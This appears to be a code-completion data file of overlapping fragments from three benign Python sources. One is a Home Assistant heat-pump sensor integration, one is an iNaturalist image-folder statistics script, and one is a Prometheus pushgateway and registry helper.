"HomeAssistant, luxtronik: LuxtronikDevice, deviceInfo: DeviceInfo, sensor_key: str, unique_id: str, name: str, icon: str,",
") # endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry,",
"# use_legacy_sensor_ids = hass.data[f\"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}\"] deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"] deviceInfoDomesticWater = hass.data[f\"{DOMAIN}_DeviceInfo_Domestic_Water\"] deviceInfoHeating = hass.data[f\"{DOMAIN}_DeviceInfo_Heating\"]",
"= hass.data.get(DOMAIN) if not luxtronik: LOGGER.warning(\"binary_sensor.async_setup_entry no luxtronik!\") return False deviceInfo = hass.data[f\"{DOMAIN}_DeviceInfo\"]",
"endregion Legacy part: async_add_entities(entities) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback",
"name: str, icon: str, device_class: str, state_class: str = None, entity_category: ENTITY_CATEGORIES =",
"# endregion Imports # region Constants PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Required(CONF_SENSORS): vol.All( cv.ensure_list,",
"sensor_cfg[CONF_GROUP] sensor = luxtronik.get_sensor(group, sensor_id) if sensor: name = sensor.name if not sensor_cfg.get("
] |
[
"grp_min = np.inf min_folder = '' grp_max = 0 max_folder = '' avg_folder",
"avg_folder += pics grp_count[i] += pics counter += 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder",
"= pics max_folder = clss if pics < grp_min: grp_min = pics min_folder",
"pics < grp_min: grp_min = pics min_folder = clss avg_folder += pics grp_count[i]",
"%d images' %(min_folder, grp_min)) print('biggest folder (%s) has %d images' %(max_folder, grp_max)) print('average",
"'/' grp_count.append(0) for clss in os.listdir(class_path): pics = len(os.listdir(class_path + clss + '/'))",
"= [] grp_min = np.inf min_folder = '' grp_max = 0 max_folder =",
"%(min_folder, grp_min)) print('biggest folder (%s) has %d images' %(max_folder, grp_max)) print('average folder size",
"avg_folder/=counter print('smallest folder (%s) has %d images' %(min_folder, grp_min)) print('biggest folder (%s) has",
"by Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images') for p in ax.patches: ax.annotate(\"%d\"",
"is %d' %(round(avg_folder))) ''' Results printed: smallest folder (Datana ministra) has 14 images",
"+= pics grp_count[i] += pics counter += 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s)",
"= 0 counter = 0 for i, bio_grp in enumerate(os.listdir(f)): class_path = f",
"133 ''' # Plot number of images per class ax = sns.barplot(grp_names, grp_count)",
"printed: smallest folder (Datana ministra) has 14 images biggest folder (Danaus plexippus) has",
"statistics import numpy as np import os import seaborn as sns import matplotlib.pyplot",
"+ bio_grp + '/' grp_count.append(0) for clss in os.listdir(class_path): pics = len(os.listdir(class_path +",
"counter = 0 for i, bio_grp in enumerate(os.listdir(f)): class_path = f + bio_grp",
"len(os.listdir(class_path + clss + '/')) if pics > grp_max: grp_max = pics max_folder",
"for p in ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()),",
"max_folder = clss if pics < grp_min: grp_min = pics min_folder = clss",
"size is 133 ''' # Plot number of images per class ax =",
"of images per class ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images by Biological",
"data statistics import numpy as np import os import seaborn as sns import",
"min_folder = clss avg_folder += pics grp_count[i] += pics counter += 1 grp_names.append(bio_grp)",
"per class ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images by Biological Group') ax.set_xlabel('Biological",
"of Images by Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images') for p in",
"''' Results printed: smallest folder (Datana ministra) has 14 images biggest folder (Danaus",
"images' %(max_folder, grp_max)) print('average folder size is %d' %(round(avg_folder))) ''' Results printed: smallest",
"number of images per class ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images by",
"clss avg_folder += pics grp_count[i] += pics counter += 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest",
"1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s) has %d images' %(min_folder, grp_min)) print('biggest folder",
"max_folder = '' avg_folder = 0 counter = 0 for i, bio_grp in",
"clss in os.listdir(class_path): pics = len(os.listdir(class_path + clss + '/')) if pics >",
"grp_max = 0 max_folder = '' avg_folder = 0 counter = 0 for",
"pics > grp_max: grp_max = pics max_folder = clss if pics < grp_min:",
"= np.inf min_folder = '' grp_max = 0 max_folder = '' avg_folder =",
"(%s) has %d images' %(max_folder, grp_max)) print('average folder size is %d' %(round(avg_folder))) '''",
"in ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()), ha='center', va='center',",
"p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()), ha='center', va='center', fontsize=8, color='black', xytext=(0, 4),",
"grp_max)) print('average folder size is %d' %(round(avg_folder))) ''' Results printed: smallest folder (Datana",
"= '' grp_max = 0 max_folder = '' avg_folder = 0 counter =",
"Results printed: smallest folder (Datana ministra) has 14 images biggest folder (Danaus plexippus)",
"[] grp_count = [] grp_min = np.inf min_folder = '' grp_max = 0",
"grp_max: grp_max = pics max_folder = clss if pics < grp_min: grp_min =",
"%d images' %(max_folder, grp_max)) print('average folder size is %d' %(round(avg_folder))) ''' Results printed:",
"as sns import matplotlib.pyplot as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count",
"Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images') for p in ax.patches: ax.annotate(\"%d\" % p.get_height(),",
"% p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()), ha='center', va='center', fontsize=8, color='black', xytext=(0,",
"if pics < grp_min: grp_min = pics min_folder = clss avg_folder += pics",
"for clss in os.listdir(class_path): pics = len(os.listdir(class_path + clss + '/')) if pics",
"np import os import seaborn as sns import matplotlib.pyplot as plt f =",
"import matplotlib.pyplot as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count = []",
"pics max_folder = clss if pics < grp_min: grp_min = pics min_folder =",
"as np import os import seaborn as sns import matplotlib.pyplot as plt f",
"grp_min)) print('biggest folder (%s) has %d images' %(max_folder, grp_max)) print('average folder size is",
"pics min_folder = clss avg_folder += pics grp_count[i] += pics counter += 1",
"seaborn as sns import matplotlib.pyplot as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = []",
"bio_grp + '/' grp_count.append(0) for clss in os.listdir(class_path): pics = len(os.listdir(class_path + clss",
"'' grp_max = 0 max_folder = '' avg_folder = 0 counter = 0",
"os import seaborn as sns import matplotlib.pyplot as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names",
"avg_folder = 0 counter = 0 for i, bio_grp in enumerate(os.listdir(f)): class_path =",
"0 counter = 0 for i, bio_grp in enumerate(os.listdir(f)): class_path = f +",
"in enumerate(os.listdir(f)): class_path = f + bio_grp + '/' grp_count.append(0) for clss in",
"grp_names = [] grp_count = [] grp_min = np.inf min_folder = '' grp_max",
"print('biggest folder (%s) has %d images' %(max_folder, grp_max)) print('average folder size is %d'",
"3949 images average folder size is 133 ''' # Plot number of images",
"# explore data statistics import numpy as np import os import seaborn as",
"+ '/')) if pics > grp_max: grp_max = pics max_folder = clss if",
"= sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images by Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of",
"images' %(min_folder, grp_min)) print('biggest folder (%s) has %d images' %(max_folder, grp_max)) print('average folder",
"ax.set_ylabel('Number of images') for p in ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x() + p.get_width()",
"f + bio_grp + '/' grp_count.append(0) for clss in os.listdir(class_path): pics = len(os.listdir(class_path",
"grp_max = pics max_folder = clss if pics < grp_min: grp_min = pics",
"Group') ax.set_ylabel('Number of images') for p in ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x() +",
"''' # Plot number of images per class ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution",
"explore data statistics import numpy as np import os import seaborn as sns",
"folder (Datana ministra) has 14 images biggest folder (Danaus plexippus) has 3949 images",
"Images by Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images') for p in ax.patches:",
"grp_count[i] += pics counter += 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s) has %d",
"as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count = [] grp_min =",
"pics grp_count[i] += pics counter += 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s) has",
"<filename>iNaturalist_stats.py<gh_stars>10-100 # explore data statistics import numpy as np import os import seaborn",
"ax.annotate(\"%d\" % p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()), ha='center', va='center', fontsize=8, color='black',",
"min_folder = '' grp_max = 0 max_folder = '' avg_folder = 0 counter",
"enumerate(os.listdir(f)): class_path = f + bio_grp + '/' grp_count.append(0) for clss in os.listdir(class_path):",
"+ p.get_width() / 2., p.get_height()), ha='center', va='center', fontsize=8, color='black', xytext=(0, 4), textcoords='offset points')",
"in os.listdir(class_path): pics = len(os.listdir(class_path + clss + '/')) if pics > grp_max:",
"p in ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()), ha='center',",
"of images') for p in ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x() + p.get_width() /",
"p.get_width() / 2., p.get_height()), ha='center', va='center', fontsize=8, color='black', xytext=(0, 4), textcoords='offset points') plt.show()",
"folder (%s) has %d images' %(min_folder, grp_min)) print('biggest folder (%s) has %d images'",
"0 for i, bio_grp in enumerate(os.listdir(f)): class_path = f + bio_grp + '/'",
"(p.get_x() + p.get_width() / 2., p.get_height()), ha='center', va='center', fontsize=8, color='black', xytext=(0, 4), textcoords='offset",
"%(max_folder, grp_max)) print('average folder size is %d' %(round(avg_folder))) ''' Results printed: smallest folder",
"np.inf min_folder = '' grp_max = 0 max_folder = '' avg_folder = 0",
"has %d images' %(min_folder, grp_min)) print('biggest folder (%s) has %d images' %(max_folder, grp_max))",
"+= pics counter += 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s) has %d images'",
"= [] grp_count = [] grp_min = np.inf min_folder = '' grp_max =",
"for i, bio_grp in enumerate(os.listdir(f)): class_path = f + bio_grp + '/' grp_count.append(0)",
"ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()), ha='center', va='center', fontsize=8,",
"+ clss + '/')) if pics > grp_max: grp_max = pics max_folder =",
"grp_min: grp_min = pics min_folder = clss avg_folder += pics grp_count[i] += pics",
"has %d images' %(max_folder, grp_max)) print('average folder size is %d' %(round(avg_folder))) ''' Results",
"folder (%s) has %d images' %(max_folder, grp_max)) print('average folder size is %d' %(round(avg_folder)))",
"[] grp_min = np.inf min_folder = '' grp_max = 0 max_folder = ''",
"counter += 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s) has %d images' %(min_folder, grp_min))",
"(Datana ministra) has 14 images biggest folder (Danaus plexippus) has 3949 images average",
"has 3949 images average folder size is 133 ''' # Plot number of",
"grp_count) ax.set_title('Distribution of Images by Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images') for",
"'' avg_folder = 0 counter = 0 for i, bio_grp in enumerate(os.listdir(f)): class_path",
"is 133 ''' # Plot number of images per class ax = sns.barplot(grp_names,",
"pics = len(os.listdir(class_path + clss + '/')) if pics > grp_max: grp_max =",
"= 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count = [] grp_min = np.inf min_folder =",
"biggest folder (Danaus plexippus) has 3949 images average folder size is 133 '''",
"folder size is 133 ''' # Plot number of images per class ax",
"(%s) has %d images' %(min_folder, grp_min)) print('biggest folder (%s) has %d images' %(max_folder,",
"matplotlib.pyplot as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count = [] grp_min",
"= 0 max_folder = '' avg_folder = 0 counter = 0 for i,",
"images per class ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images by Biological Group')",
"0 max_folder = '' avg_folder = 0 counter = 0 for i, bio_grp",
"+ '/' grp_count.append(0) for clss in os.listdir(class_path): pics = len(os.listdir(class_path + clss +",
"= 0 for i, bio_grp in enumerate(os.listdir(f)): class_path = f + bio_grp +",
"os.listdir(class_path): pics = len(os.listdir(class_path + clss + '/')) if pics > grp_max: grp_max",
"= f + bio_grp + '/' grp_count.append(0) for clss in os.listdir(class_path): pics =",
"ax.set_title('Distribution of Images by Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images') for p",
"'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count = [] grp_min = np.inf min_folder = ''",
"%(round(avg_folder))) ''' Results printed: smallest folder (Datana ministra) has 14 images biggest folder",
"clss + '/')) if pics > grp_max: grp_max = pics max_folder = clss",
"import os import seaborn as sns import matplotlib.pyplot as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/'",
"grp_count.append(0) for clss in os.listdir(class_path): pics = len(os.listdir(class_path + clss + '/')) if",
"i, bio_grp in enumerate(os.listdir(f)): class_path = f + bio_grp + '/' grp_count.append(0) for",
"= pics min_folder = clss avg_folder += pics grp_count[i] += pics counter +=",
"folder size is %d' %(round(avg_folder))) ''' Results printed: smallest folder (Datana ministra) has",
"%d' %(round(avg_folder))) ''' Results printed: smallest folder (Datana ministra) has 14 images biggest",
"numpy as np import os import seaborn as sns import matplotlib.pyplot as plt",
"= clss if pics < grp_min: grp_min = pics min_folder = clss avg_folder",
"= clss avg_folder += pics grp_count[i] += pics counter += 1 grp_names.append(bio_grp) avg_folder/=counter",
"folder (Danaus plexippus) has 3949 images average folder size is 133 ''' #",
"average folder size is 133 ''' # Plot number of images per class",
"bio_grp in enumerate(os.listdir(f)): class_path = f + bio_grp + '/' grp_count.append(0) for clss",
"size is %d' %(round(avg_folder))) ''' Results printed: smallest folder (Datana ministra) has 14",
"ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images by Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number",
"plexippus) has 3949 images average folder size is 133 ''' # Plot number",
"pics counter += 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s) has %d images' %(min_folder,",
"'/')) if pics > grp_max: grp_max = pics max_folder = clss if pics",
"< grp_min: grp_min = pics min_folder = clss avg_folder += pics grp_count[i] +=",
"if pics > grp_max: grp_max = pics max_folder = clss if pics <",
"ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images') for p in ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x()",
"images average folder size is 133 ''' # Plot number of images per",
"import seaborn as sns import matplotlib.pyplot as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names =",
"class_path = f + bio_grp + '/' grp_count.append(0) for clss in os.listdir(class_path): pics",
"clss if pics < grp_min: grp_min = pics min_folder = clss avg_folder +=",
"+= 1 grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s) has %d images' %(min_folder, grp_min)) print('biggest",
"f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count = [] grp_min = np.inf min_folder",
"sns import matplotlib.pyplot as plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count =",
"images') for p in ax.patches: ax.annotate(\"%d\" % p.get_height(), (p.get_x() + p.get_width() / 2.,",
"> grp_max: grp_max = pics max_folder = clss if pics < grp_min: grp_min",
"sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images by Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images')",
"Biological Group') ax.set_xlabel('Biological Group') ax.set_ylabel('Number of images') for p in ax.patches: ax.annotate(\"%d\" %",
"plt f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/' grp_names = [] grp_count = [] grp_min = np.inf",
"grp_count = [] grp_min = np.inf min_folder = '' grp_max = 0 max_folder",
"# Plot number of images per class ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution of",
"images biggest folder (Danaus plexippus) has 3949 images average folder size is 133",
"has 14 images biggest folder (Danaus plexippus) has 3949 images average folder size",
"(Danaus plexippus) has 3949 images average folder size is 133 ''' # Plot",
"smallest folder (Datana ministra) has 14 images biggest folder (Danaus plexippus) has 3949",
"Plot number of images per class ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images",
"print('smallest folder (%s) has %d images' %(min_folder, grp_min)) print('biggest folder (%s) has %d",
"class ax = sns.barplot(grp_names, grp_count) ax.set_title('Distribution of Images by Biological Group') ax.set_xlabel('Biological Group')",
"import numpy as np import os import seaborn as sns import matplotlib.pyplot as",
"grp_names.append(bio_grp) avg_folder/=counter print('smallest folder (%s) has %d images' %(min_folder, grp_min)) print('biggest folder (%s)",
"ministra) has 14 images biggest folder (Danaus plexippus) has 3949 images average folder",
"= '' avg_folder = 0 counter = 0 for i, bio_grp in enumerate(os.listdir(f)):",
"= len(os.listdir(class_path + clss + '/')) if pics > grp_max: grp_max = pics",
"14 images biggest folder (Danaus plexippus) has 3949 images average folder size is",
"print('average folder size is %d' %(round(avg_folder))) ''' Results printed: smallest folder (Datana ministra)",
"grp_min = pics min_folder = clss avg_folder += pics grp_count[i] += pics counter"
] |
[
"= m.groupdict() service_name = components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m",
"raise ValueError(\"Service '\" + service + \"' not found.\") return pushgateways def get_registry(name):",
"service + \"' not found.\") return pushgateways def get_registry(name): if name not in",
"re from prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir",
"pushgateways[service] = dal.client else: raise ValueError(\"Service '\" + service + \"' is not",
"if name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not None:",
"name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name])",
"not None: components = m.groupdict() service_name = components['name'] if service_name in apialchemy_binds.keys(): conn_str",
"if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry =",
"in pushgateway_services: m = service_name_pattern.match(service) if m is not None: components = m.groupdict()",
"+ \"' is not a valid Pushgateway.\") else: raise ValueError(\"Service '\" + service",
"if m is not None: components = m.groupdict() if components['vendor'] == 'pushgateway': from",
"Pushgateway.\") else: raise ValueError(\"Service '\" + service + \"' not found.\") return pushgateways",
"api_vendor_pattern.match(conn_str) if m is not None: components = m.groupdict() if components['vendor'] == 'pushgateway':",
"apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is not None: components",
"raise ValueError(\"Service '\" + service + \"' is not a valid Pushgateway.\") else:",
"collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name,",
"None: components = m.groupdict() service_name = components['name'] if service_name in apialchemy_binds.keys(): conn_str =",
"== 'pushgateway': from ..api.pushgateway import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client",
"collector_registries[name] def register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if name",
"service in pushgateway_services: m = service_name_pattern.match(service) if m is not None: components =",
"dal.init_aa(service_name) pushgateways[service] = dal.client else: raise ValueError(\"Service '\" + service + \"' is",
"from prometheus_client.multiprocess import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info):",
"service_name_pattern.match(service) if m is not None: components = m.groupdict() service_name = components['name'] if",
"os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern =",
"+ r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services =",
"m.groupdict() if components['vendor'] == 'pushgateway': from ..api.pushgateway import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name)",
"= CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector):",
"is not None: components = m.groupdict() service_name = components['name'] if service_name in apialchemy_binds.keys():",
"None: components = m.groupdict() if components['vendor'] == 'pushgateway': from ..api.pushgateway import Pushgateway dal",
"apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X)",
"m is not None: components = m.groupdict() if components['vendor'] == 'pushgateway': from ..api.pushgateway",
"if components['vendor'] == 'pushgateway': from ..api.pushgateway import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service]",
"= {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds",
"components['vendor'] == 'pushgateway': from ..api.pushgateway import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] =",
"re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m = service_name_pattern.match(service) if m is",
"else: raise ValueError(\"Service '\" + service + \"' not found.\") return pushgateways def",
"from prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir =",
"in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is not None:",
"components = m.groupdict() if components['vendor'] == 'pushgateway': from ..api.pushgateway import Pushgateway dal =",
"def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^'",
"import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways =",
"import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else: raise ValueError(\"Service '\"",
"<filename>metREx/app/main/util/prometheus_helper.py<gh_stars>1-10 import os import re from prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector",
"{} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds =",
"is not None: components = m.groupdict() if components['vendor'] == 'pushgateway': from ..api.pushgateway import",
"def register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if name in",
"m = service_name_pattern.match(service) if m is not None: components = m.groupdict() service_name =",
"Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else: raise ValueError(\"Service '\" +",
"collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def",
"= apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern",
"dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else: raise ValueError(\"Service '\" + service",
"apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:'",
"{} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) +",
"ValueError(\"Service '\" + service + \"' not found.\") return pushgateways def get_registry(name): if",
"pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m = service_name_pattern.match(service)",
"MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector):",
"prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry = get_registry(name)",
"import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def",
"return collector_registries[name] def register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if",
"+ service + \"' is not a valid Pushgateway.\") else: raise ValueError(\"Service '\"",
"for service in pushgateway_services: m = service_name_pattern.match(service) if m is not None: components",
"= os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern",
"prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir')",
"MultiProcessCollector collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {}",
"\"' not found.\") return pushgateways def get_registry(name): if name not in collector_registries.keys(): collector_registries[name]",
"= get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if name in collector_registries.keys(): collector_registries[name].unregister(collector) del collector_registries[name]",
"r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for",
"= apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is not None: components = m.groupdict()",
"not found.\") return pushgateways def get_registry(name): if name not in collector_registries.keys(): collector_registries[name] =",
"if m is not None: components = m.groupdict() service_name = components['name'] if service_name",
"re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m",
"get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' +",
"os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m = service_name_pattern.match(service) if m is not",
"= re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services:",
"import re from prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries = {}",
"dal.client else: raise ValueError(\"Service '\" + service + \"' is not a valid",
"is not a valid Pushgateway.\") else: raise ValueError(\"Service '\" + service + \"'",
"None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name,",
"service_name = components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str)",
"ValueError(\"Service '\" + service + \"' is not a valid Pushgateway.\") else: raise",
"service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is not",
"found.\") return pushgateways def get_registry(name): if name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry()",
"pushgateways = {} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' +",
"components = m.groupdict() service_name = components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name]",
"is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector)",
"prometheus_client.multiprocess import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways",
"= m.groupdict() if components['vendor'] == 'pushgateway': from ..api.pushgateway import Pushgateway dal = Pushgateway(aa)",
"service + \"' is not a valid Pushgateway.\") else: raise ValueError(\"Service '\" +",
"r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None,",
"def get_registry(name): if name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is",
"if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is",
"= api_vendor_pattern.match(conn_str) if m is not None: components = m.groupdict() if components['vendor'] ==",
"not None: components = m.groupdict() if components['vendor'] == 'pushgateway': from ..api.pushgateway import Pushgateway",
"else: raise ValueError(\"Service '\" + service + \"' is not a valid Pushgateway.\")",
"return pushgateways def get_registry(name): if name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if",
"collector): job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if name in collector_registries.keys(): collector_registries[name].unregister(collector)",
"= service_name_pattern.match(service) if m is not None: components = m.groupdict() service_name = components['name']",
"Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else: raise ValueError(\"Service '\" + service + \"'",
